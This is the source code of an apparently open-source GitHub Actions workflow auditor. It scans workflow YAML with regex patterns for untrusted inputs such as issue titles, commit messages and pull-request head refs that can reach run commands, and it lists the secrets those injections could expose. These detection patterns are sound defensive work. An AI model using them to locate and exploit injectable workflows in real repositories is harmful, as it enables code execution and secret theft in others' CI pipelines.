├── requirements.txt ├── static └── TinderSecurity.png ├── scan_config.json ├── lib └── logger.py ├── action_auditor.py ├── README.md ├── LICENSE.md ├── query_data.py ├── main.py ├── .gitignore ├── workflow.py ├── github_wrapper.py └── auditor.py /requirements.txt: -------------------------------------------------------------------------------- 1 | PyYAML==6.0 2 | requests==2.26.0 3 | -------------------------------------------------------------------------------- /static/TinderSecurity.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TinderSec/gh-workflow-auditor/HEAD/static/TinderSecurity.png -------------------------------------------------------------------------------- /scan_config.json: -------------------------------------------------------------------------------- 1 | { 2 | "rce_risks":{ 3 | "unsafe_inputs":{ 4 | "user_input_body_title":"\\${{\\s*github.event.(.*).(body|title)\\s*}}", 5 | "malicious_commit_message":"\\${{\\s*(.*).head_commit.message\\s*}}", 6 | "malicious_input":"\\${{\\s*(.*)github.event.review(.*)\\s*}}", 7 | "environ_regex":"\\${{\\s*env.[A-Za-z0-9_-]*\\s*}}", 8 | "malicious_author":"\\${{\\s*github.event.(.*).author.(name|email)\\s*}}" 9 | }, 10 | "malicious_commits":{ 11 | "malicious_commit_referenced":"\\${{\\s*github.pull_request.head(.*)\\s*}}", 12 | "malicious_pull_request_event":"\\${{\\s*(.*)github.event.pull_request.head(.*)\\s*}}" 13 | } 14 | }, 15 | "secrets":"\\${{\\s*secrets\\.[A-Za-z-_0-9]*\\s*}}", 16 | "risky_events":["pull_request_target","issues","issue_comment"] 17 | } -------------------------------------------------------------------------------- /lib/logger.py: -------------------------------------------------------------------------------- 1 | import logging 2 | 3 | def parse_log_level_input(input): 4 | if input == 'debug': 5 | level = logging.DEBUG 6 | elif input == 'info': 7 | level = logging.INFO 8 | elif input == 'warning': 9 | level = logging.WARNING 10 | elif input == 'error': 11 | level = logging.ERROR 12 | elif input == 'critical': 13 | level = logging.CRITICAL 14 | else: 15 | input = logging.INFO 16 | 17 | return level 18 | 19 | def build_logger(log_level='info'): 20 | log_format = logging.Formatter('%(levelname)s: %(message)s') 21 | logger = logging.getLogger('Audit Log') 22 | log_level = parse_log_level_input(log_level) 23 | logger.setLevel(log_level) 24 | 25 | channel = logging.StreamHandler() 26 | channel.setFormatter(log_format) 27 | 28 | log_file = logging.FileHandler('scan.log') 29 | 30 | logger.addHandler(channel) 31 | logger.addHandler(log_file) 32 | return logger 33 | 34 | -------------------------------------------------------------------------------- /action_auditor.py: -------------------------------------------------------------------------------- 1 | from pathlib import Path 2 | import re 3 | 4 | def read_actions_file(): 5 | array_of_usernames = [] 6 | with open('actions.txt','r') as lines: 7 | for line in lines: 8 | username = line.split('/')[0] 9 | username_regex = re.compile("[A-Za-z0-9-]*") 10 | if username_regex.fullmatch(username): 11 | if username not in array_of_usernames: 12 | array_of_usernames.append(username) 13 | return array_of_usernames 14 | 15 | class ActionAuditor: 16 | def __init__(self, gh_wrapper, logger): 17 | self.gh = gh_wrapper 18 | self.logger = logger 19 | 20 | def check_usernames(self, username_list): 21 | for username in username_list: 22 | renamed_or_not = self.gh.stale_checker(username=username) 23 | if not renamed_or_not: 24 | self.logger.warning(f"Security Issue: Supply chain. {username} was renamed but used in workflows. Signup the username at https://github.com to make sure.") 25 | 26 | def action_audit(self): 27 | if Path('actions.txt').exists(): 28 | usernames = read_actions_file() 29 | self.check_usernames(usernames) 30 | Path('actions.txt').unlink() 31 | else: 32 | self.logger.info("No actions.txt file to scan. Supply chain scan complete.") 33 | 34 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 |

4 | 5 | # GitHub Workflow Auditor 6 | Workflow auditing tools to identify security issues in GitHub workflows 7 | 8 | # Usage 9 | 10 | ``` 11 | usage: main.py [-h] [--type {repo,org,user}] [--log-level {debug,info,warning,error,critical}] input 12 | 13 | Identify vulnerabilities in GitHub Actions workflow 14 | 15 | positional arguments: 16 | input User/Org Name or Repo name (owner/repo). 17 | 18 | optional arguments: 19 | -h, --help show this help message and exit 20 | --type {repo,org,user} 21 | Type of entity that is being scanned. 22 | --log-level {debug,info,warning,error,critical} 23 | Log level for output 24 | ``` 25 | 26 | Example: 27 | * org - `python3 main.py --type org google` 28 | * user - `python3 main.py --type user test_user` 29 | * repo: `python3 main.py --type repo TinderSec/gh-workflow-auditor` 30 | 31 | # Setup 32 | 33 | GitHub Workflow Auditor uses GitHub's GraphQL endoint. Due to this, an API token is required. The program will read it from the `PAT` environment variable. You can generate a basic PAT token (https://github.com/settings/tokens/new) without any scope. Note that you may have to "Configure SSO" for the token to be usable on some organizations. 34 | 35 | ``` 36 | export PAT=ghp_YOUR_TOKEN 37 | ``` 38 | 39 | # About 40 | GitHub Workflow Auditor identifies vulnerability in GitHub Workflows. It does so by scanning the workflow files for anti-patterns such as ingesting user inputs in an unsafe manner or using malicious commits in build process. The tool supports scanning individual repositories or all accessibe repositories of a user or organization. The output of the scan is saved as `scan.log`. 41 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | Copyright 2022 Match Group, LLC 2 | 3 | The copyright holder grants you permission to and use or redistribute this software in source and binary forms, with or without modification, conditioned on your acceptance of, and adherence to, the following conditions: 4 | 5 | 1. Redistributions of source code, whether or not modified, must retain the above copyright notice, this list of conditions, and the following disclaimer. If modified, the source code must identify the modifications (identification in general terms is acceptable). 6 | 2. Redistributions in binary or application form must reproduce the above copyright notice, this list of conditions, and the following disclaimer in the documentation or other materials provided with the binary or application. 7 | 3. You may not use the name of the copyright holder nor the names of the contributors to endorse or promote products derived from this software without specific prior written permission. 8 | 4. You may use this software only to scan and assess your own software and systems and may not use it for any malicious or illegal purpose. You may disclose any potential vulnerabilities you detect with this software only to the developer of the software in which you detect the potential vulnerability. 9 | 10 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. YOU AGREE TO INDEMNIFY AND HOLD HARMLESS THE COPYRIGHT HOLDER AND ALL CONTRIBUTORS AGAINST ANY CLAIMS THAT ARISE BASED ON YOUR USE, MODIFICATION, OR REDISTRIBUTION OF THIS SOFTWARE. -------------------------------------------------------------------------------- /query_data.py: -------------------------------------------------------------------------------- 1 | def return_query(query_type,name,after=None): 2 | if query_type == 'repository': 3 | owner,name = name.split('/') 4 | return f"""query {{ 5 | repository(owner: "{owner}",name: "{name}") {{ 6 | nameWithOwner 7 | object(expression: "HEAD:.github/workflows/") {{ 8 | ... on Tree {{ 9 | entries {{ 10 | name 11 | lineCount 12 | object {{ 13 | ... on Blob {{ 14 | text 15 | }} 16 | }} 17 | }} 18 | }} 19 | }} 20 | }} 21 | }}""" 22 | else: 23 | after_query = f",after:\"{after}\"" if after else "" 24 | return f"""query {{ 25 | {query_type}(login:"{name}"){{ 26 | repositories(first:100 {after_query}){{ 27 | edges{{ 28 | node{{ 29 | nameWithOwner, 30 | object(expression: "HEAD:.github/workflows/") {{ 31 | ... on Tree {{ 32 | entries {{ 33 | name 34 | lineCount 35 | object {{ 36 | ... on Blob {{ 37 | text 38 | }} 39 | }} 40 | }} 41 | }} 42 | }} 43 | }} 44 | }} 45 | pageInfo {{ 46 | startCursor 47 | hasNextPage 48 | endCursor 49 | }} 50 | }} 51 | }} 52 | }}""" 53 | 54 | def validation_query(username, guess_type): 55 | return f"""query {{ 56 | {guess_type}(login:"{username}"){{ 57 | repositories(first:1){{ 58 | edges{{ 59 | node{{ 60 | nameWithOwner 61 | }} 62 | }} 63 | }} 64 | }} 65 | }}""" -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | # Local imports 4 | from auditor import content_analyzer 5 | from action_auditor import ActionAuditor 6 | from github_wrapper import GHWrapper 7 | from lib.logger import build_logger 8 | 9 | 10 | """ 11 | Input: 12 | repo_dict - dictionary defining repo information 13 | scan_folder - Location where the repo is cloned 14 | Output: 15 | scan result (if any) in scan.log file. 16 | Summary: 17 | For a given workflow dictionary (name, content) this 18 | function will call content_analyzer to audit the workflow 19 | for any potential vulnerabilities. 20 | """ 21 | def repo_analysis(repo_workflow, logger): 22 | for workflow in repo_workflow: 23 | workflow_name = workflow['name'] 24 | workflow_content = workflow['content'] 25 | logger.info(f">> Scanning: {workflow_name}") 26 | content_analyzer(content=workflow_content, logger=logger) # will print out security issues 27 | 28 | def main(): 29 | # Supporting user provided arguments: type, log level, and scan target. 30 | parser = argparse.ArgumentParser(description='Identify vulnerabilities in GitHub Actions workflow') 31 | parser.add_argument('--type',choices=['repo','org','user'], 32 | help='Type of entity that is being scanned.') 33 | parser.add_argument('--log-level',choices=['debug','info','warning','error','critical'], default='info') 34 | parser.add_argument('input',help='Org, user or repo name (owner/name)') 35 | args = parser.parse_args() 36 | 37 | target_type = args.type #repo, org, or user 38 | target_input = args.input #can be repo url, or a username for org/user 39 | log_level = args.log_level 40 | 41 | logger = build_logger(log_level) 42 | gh = GHWrapper(logger) 43 | 44 | if target_type == 'repo': 45 | repos = gh.get_single_repo(repo_name=target_input) 46 | else: 47 | count, repos = gh.get_multiple_repos(target_name=target_input, 48 | target_type=target_type) 49 | logger.info(f"Metric: Scanning total {count} repos") 50 | 51 | for repo_dict in repos: 52 | logger.info(f"> Starting audit of {repo_dict}") 53 | repo_workflows = repos[repo_dict] 54 | repo_analysis(repo_workflows, logger) 55 | 56 | logger.info(f"> Checking for supply chain attacks.") 57 | action_auditor = ActionAuditor(gh, logger) 58 | action_auditor.action_audit() 59 | 60 | main() 61 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib64/ 18 | parts/ 19 | sdist/ 20 | var/ 21 | wheels/ 22 | pip-wheel-metadata/ 23 | share/python-wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | MANIFEST 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .nox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | *.py,cover 50 | .hypothesis/ 51 | .pytest_cache/ 52 | 53 | # Translations 54 | *.mo 55 | *.pot 56 | 57 | # Django stuff: 58 | *.log 59 | local_settings.py 60 | db.sqlite3 61 | db.sqlite3-journal 62 | 63 | # Flask stuff: 64 | instance/ 65 | .webassets-cache 66 | 67 | # Scrapy stuff: 68 | .scrapy 69 | 70 | # Sphinx documentation 71 | docs/_build/ 72 | 73 | # PyBuilder 74 | target/ 75 | 76 | # Jupyter Notebook 77 | .ipynb_checkpoints 78 | 79 | # IPython 80 | profile_default/ 81 | ipython_config.py 82 | 83 | # pyenv 84 | .python-version 85 | 86 | # pipenv 87 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 88 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 89 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 90 | # install all needed dependencies. 91 | #Pipfile.lock 92 | 93 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 94 | __pypackages__/ 95 | 96 | # Celery stuff 97 | celerybeat-schedule 98 | celerybeat.pid 99 | 100 | # SageMath parsed files 101 | *.sage.py 102 | 103 | # Environments 104 | .env 105 | .venv 106 | env/ 107 | venv/ 108 | ENV/ 109 | env.bak/ 110 | venv.bak/ 111 | 112 | # Spyder project settings 113 | .spyderproject 114 | .spyproject 115 | 116 | # Rope project settings 117 | .ropeproject 118 | 119 | # mkdocs documentation 120 | /site 121 | 122 | # mypy 123 | .mypy_cache/ 124 | .dmypy.json 125 | dmypy.json 126 | 127 | # Pyre type checker 128 | .pyre/ 129 | *.sh 130 | .DS_Store 131 | -------------------------------------------------------------------------------- /workflow.py: -------------------------------------------------------------------------------- 1 | import json 2 | import re 3 | import yaml 4 | 5 | class WorkflowParser(): 6 | def __init__(self, yaml_content: str): 7 | try: 8 | self.parsed_content = yaml.safe_load(yaml_content) # We don't want a vulnerability ;) 9 | except: 10 | self.parsed_content= {'failed':True} 11 | 12 | def get_event_triggers(self) -> list: 13 | # Check what starts a workflow. Can be list or dict 14 | if self.parsed_content.get(True,None): 15 | if isinstance(self.parsed_content[True], list): 16 | return self.parsed_content[True] 17 | elif isinstance(self.parsed_content[True], dict): 18 | return list(self.parsed_content[True].keys()) 19 | else: 20 | return [self.parsed_content[True]] 21 | 22 | def get_jobs(self) -> dict: 23 | return self.parsed_content.get('jobs',None) 24 | 25 | def get_jobs_count(self) -> int: 26 | # list how many jobs execute. Jobs run on their own individual runners. 27 | return len(self.parsed_content['jobs'].keys()) 28 | 29 | def get_steps_for_jobs(self, job_dict: dict) -> list: 30 | # return a list of steps in a given job dictionary 31 | return job_dict.get('steps',None) 32 | 33 | def analyze_step(self, step:dict) -> tuple: 34 | actions = step.get('uses',None) 35 | run_command = step.get('run',None) 36 | with_input = step.get('with',None) 37 | step_environ = step.get('env', None) # you can define environment variables per step. 38 | return actions, run_command, with_input, step_environ 39 | 40 | 41 | # Analyze various aspects of workflows to identify if it is risky. 42 | class WorkflowVulnAudit(): 43 | def __init__(self): 44 | # get scan config regex ready 45 | self.unsafe_input = {} 46 | self.malicious_commits = {} 47 | with open('scan_config.json','r') as scan_file: 48 | scan_config = json.loads(scan_file.read()) 49 | self.triggers = scan_config['risky_events'] 50 | self.secrets = re.compile(scan_config['secrets']) 51 | for risky_input in scan_config['rce_risks']['unsafe_inputs']: 52 | self.unsafe_input[risky_input] = re.compile(scan_config['rce_risks']['unsafe_inputs'][risky_input]) 53 | for commit_to_watch in scan_config['rce_risks']['malicious_commits']: 54 | self.malicious_commits[commit_to_watch] = re.compile(scan_config['rce_risks']['malicious_commits'][commit_to_watch]) 55 | self.vulnerable = {'vulnerable':True} 56 | 57 | def risky_command(self, command_string) -> list: 58 | found_matches = {} 59 | for regex in self.unsafe_input: 60 | if matches := self.unsafe_input[regex].finditer(command_string): 61 | matched_commands = [command.group() for command in matches] 62 | if matched_commands: 63 | found_matches[regex] = matched_commands 64 | return found_matches 65 | 66 | def risky_trigger(self, trigger_name: str) -> bool: 67 | return bool(trigger_name in self.triggers) 68 | 69 | # Find and return every secrets being used in this workflow. If there is a RCE we can pull these secrets. 70 | def get_secrets(self, full_yaml: str) -> list: 71 | found_matches = [] 72 | if matches:= self.secrets.findall(full_yaml): 73 | for match in matches: 74 | if match not in found_matches: 75 | found_matches.append(match) 76 | return found_matches 77 | 78 | def risky_commit(self, referenced): 79 | found_matches = {} 80 | for regex in self.malicious_commits: 81 | if matches := self.malicious_commits[regex].finditer(referenced): 82 | matched_commits = [commit.group() for commit in matches] 83 | if matched_commits: 84 | found_matches[regex] = matched_commits 85 | return found_matches 86 | -------------------------------------------------------------------------------- /github_wrapper.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import requests 4 | 5 | from query_data import return_query, validation_query 6 | 7 | """ 8 | Input: 9 | token - GitHub PAT. Retrieved from environment variable. 10 | logger - Configured logger 11 | 12 | Summary: 13 | This wrapper uses GitHub's GraphQL API and repository(ies) 14 | for the provided scan target. In addition, it is also used 15 | at the end of the workflow for stale account checks. 16 | """ 17 | class GHWrapper(): 18 | def __init__(self, logger): 19 | self.token = os.environ.get('PAT',None) 20 | self.logger = logger 21 | if self.token is None: 22 | self.logger.warning("No GitHub token provided in the PAT env variable. Exiting.") 23 | sys.exit() 24 | if not self.validate_token(): 25 | self.logger.warning("GitHub token provided in the PAT env variable is invalid. Exiting.") 26 | sys.exit() 27 | 28 | def validate_token(self): 29 | header = {"Authorization":f"token {self.token}"} 30 | url = "https://api.github.com" 31 | validation_req = requests.get(url=url, headers=header) 32 | valid_status = True 33 | if validation_req.status_code == 401: 34 | valid_status = False 35 | else: 36 | valid_status = True 37 | return valid_status 38 | 39 | def call_graphql(self, query): 40 | headers = {'Authorization':f"Bearer {self.token}", 41 | 'Content-Type':'application/json'} 42 | query_request = requests.post(url='https://api.github.com/graphql', 43 | json = {'query':query}, 44 | headers = headers) 45 | if query_request.status_code == 200: 46 | return query_request.json() 47 | else: 48 | message = query_request.text 49 | logger.error(f"GitHub GraphQL Query failed: {message}") 50 | sys.exit(1) 51 | 52 | def repo_node_parser(self,repo_node): 53 | workflow_object = repo_node['object'] 54 | repo_workflows = [] 55 | if workflow_object: 56 | workflows = workflow_object['entries'] 57 | for workflow in workflows: 58 | workflow_name = workflow['name'] 59 | if workflow.get('object',None): 60 | workflow_text = workflow['object'].get('text',None) 61 | workflow_ext = workflow_name.split('.')[-1] 62 | if workflow_ext == "yml" or workflow_ext == "yaml": 63 | repo_workflows.append({'name':workflow_name,'content':workflow_text}) 64 | return repo_workflows 65 | 66 | def get_single_repo(self, repo_name): 67 | repos_all = {} 68 | repo_query = return_query('repository', 69 | repo_name) 70 | repos = self.call_graphql(repo_query) 71 | if repos.get('errors') is None: 72 | repo_node = repos['data']['repository'] 73 | repo_name = repo_node['nameWithOwner'] 74 | repo_workflows = self.repo_node_parser(repo_node) 75 | if repo_workflows: # this repo has workflows 76 | repos_all[repo_name] = repo_workflows 77 | else: 78 | self.logger.debug(f"Repo {repo_name} has no workflow.") 79 | return repos_all 80 | 81 | def get_multiple_repos(self,target_name,target_type='org'): 82 | self.logger.info(f"---- Getting repos for {target_name}----") 83 | repos_all = {} 84 | query_type = {'org':'organization','user':'user','repo':'repository'} 85 | try: 86 | next_cursor = None 87 | has_more = True # for pagination loop 88 | count = 0 89 | while has_more: 90 | query = return_query(query_type[target_type], 91 | target_name, next_cursor) 92 | repos = self.call_graphql(query) 93 | if repos.get('errors') is None: 94 | for repo in repos['data'][query_type[target_type]]['repositories']['edges']: 95 | repo_node = repo['node'] 96 | repo_name = repo_node['nameWithOwner'] 97 | repo_workflows = self.repo_node_parser(repo_node) 98 | if repo_workflows: 99 | repos_all[repo_name] = repo_workflows 100 | count += 1 101 | else: 102 | self.logger.debug(f"Repo {repo_name} has no workflow.") 103 | has_more = repos['data'][query_type[target_type]]['repositories']['pageInfo']['hasNextPage'] 104 | next_cursor = repos['data'][query_type[target_type]]['repositories']['pageInfo']['endCursor'] 105 | if has_more: 106 | logger.info("> Retrieve next batch of 100 repos.") 107 | else: 108 | self.logger.error(f"GraphQL response had error.") 109 | sys.exit(1) 110 | except Exception as repo_err: 111 | self.logger.debug(f"Error parsing data. Message: {str(repo_err)}") 112 | return count, repos_all 113 | 114 | def stale_checker(self,username): 115 | valid = False 116 | if username: 117 | user_query = validation_query(username, 'user') 118 | is_it_user = self.call_graphql(query=user_query)['data']['user'] 119 | org_query = validation_query(username, 'organization') 120 | is_it_org = self.call_graphql(query = org_query)['data']['organization'] 121 | if is_it_user or is_it_org: 122 | valid = True 123 | return valid 124 | 125 | 126 | 127 | -------------------------------------------------------------------------------- /auditor.py: -------------------------------------------------------------------------------- 1 | from workflow import WorkflowParser, WorkflowVulnAudit 2 | 3 | vuln_analyzer = WorkflowVulnAudit() 4 | 5 | def risky_trigger_analysis(identified_triggers): 6 | return_triggers = [] 7 | for trigger in identified_triggers: 8 | risky_or_not = vuln_analyzer.risky_trigger(trigger_name=trigger) 9 | if risky_or_not: 10 | return_triggers.append(trigger) 11 | return return_triggers 12 | 13 | 14 | """ 15 | Input: 16 | content - YAML content read from the workflow files. 17 | logger - configured logger 18 | Output: 19 | scan result (if any) in scan.log file. 20 | Summary: 21 | This is the critical part of the whole tool. It parses the 22 | YAML content to identify security issues. It does so by: 23 | parsing YAML to JSON, identifying keys such as event triggers, 24 | jobs and steps. It then checks the identified key-value pairs 25 | against known risks through WorkflowParser and WorkflowVulnAudit. 26 | """ 27 | def content_analyzer(content, logger): 28 | risky_triggers = [] 29 | all_actions = [] 30 | commands = [] 31 | environs = {} 32 | checked_action = [] 33 | workflow_client = WorkflowParser(content) 34 | if workflow_client.parsed_content and not workflow_client.parsed_content.get('failed',None): # Sanity check to make sure proper YAML was given. 35 | event_triggers = workflow_client.get_event_triggers() # Identify what event(s) will start the workflow. 36 | secrets = vuln_analyzer.get_secrets(content) # get all the secrets in the workflow. (Uses regex). This helps understand impact. 37 | all_jobs = workflow_client.get_jobs() # Identify all jobs in the workflow. Stored as dictionary 38 | 39 | counter = 1 # Counter used to identify which line of code is vulnerable. 40 | if secrets: 41 | logger.info(f">>> Secrets used in workflow: {','.join(secrets)}") 42 | 43 | # Retrieve and store all needed information for a workflow run for analysis. 44 | if all_jobs: 45 | for job in all_jobs: 46 | steps = all_jobs[job].get('steps',None) 47 | if not steps: 48 | steps = [all_jobs[job]] 49 | try: 50 | environs.update(all_jobs[job].get('env',{})) 51 | except: 52 | logger.info(">> Environ variable is malformed") 53 | for step_number,step in enumerate(steps): 54 | actions, run_command, with_input, step_environ = workflow_client.analyze_step(step) 55 | if actions: 56 | all_actions.append({f"Job{counter}.Step{step_number+1}":step}) 57 | if step_environ: 58 | if isinstance(step_environ, str): 59 | step_environ = {f"{step_number}{step}":step_environ} 60 | environs.update(step_environ) 61 | if run_command: 62 | commands.append({f"Job{counter}.Step{step_number+1}":step}) 63 | counter +=1 64 | 65 | # Start analyzing the retrieved information. 66 | try: 67 | # Analyzes event triggers to see if they are user controlled. 68 | risky_triggers = risky_trigger_analysis(identified_triggers=event_triggers) 69 | 70 | # Analyzes commands called by Steps. 71 | for command in commands: 72 | for step_number, step_dict in command.items(): 73 | risky_command = vuln_analyzer.risky_command(command_string=step_dict['run']) 74 | if risky_command: 75 | for regex, matched_strings in risky_command.items(): 76 | if regex == 'environ_regex': # not all environments are bad. Check if this environment is user controlled. 77 | # get the key out of the matched strings. We use this to check if the environ variable stores any user controlled input. 78 | for environ_variable in matched_strings: 79 | environ_variable = environ_variable.strip('${{').strip('}}').split('.')[1].strip() 80 | # get environ value 81 | environ_var_value = environs.get(environ_variable,None) 82 | if environ_var_value: 83 | risky_env = vuln_analyzer.risky_command(command_string=environ_var_value) 84 | if risky_env and list(risky_env.keys())[0] != 'environ_regex': 85 | logger.warning(f">>> Security Issue: RCE detected with {regex} in {step_number}: ENV variable {environ_variable} is called through GitHub context and takes user input {environ_var_value}") 86 | else: 87 | logger.warning(f">>> Security Issue: RCE detected with {regex} in {step_number}: Usage of {','.join(matched_strings)} found.") 88 | 89 | # Some actions combined with triggers can be bad. Check for those cases. 90 | action_storage = open('actions.txt','a+') 91 | for action in all_actions: 92 | for step_number, step_dict in action.items(): 93 | action_name = step_dict.get('uses',None) 94 | action_storage.write(f"{action_name}\n") 95 | if 'actions/checkout' in action_name: 96 | # check if specific branch is checked out 97 | if step_dict.get('with',None): 98 | if step_dict['with'].get('ref',None): 99 | ref_value = step_dict['with'].get('ref') 100 | risky_commits = vuln_analyzer.risky_commit(referenced=ref_value) 101 | if risky_commits: 102 | if 'pull_request_target' in risky_triggers: 103 | logger.warning(f">>> Security Issue: Malicious pull request used in actions/checkout. Vulnerable step: {step_number} ") 104 | action_storage.close() 105 | except Exception as workflow_err: 106 | logger.info(f">>> Error parsing workflow. Error is {str(workflow_err)}") --------------------------------------------------------------------------------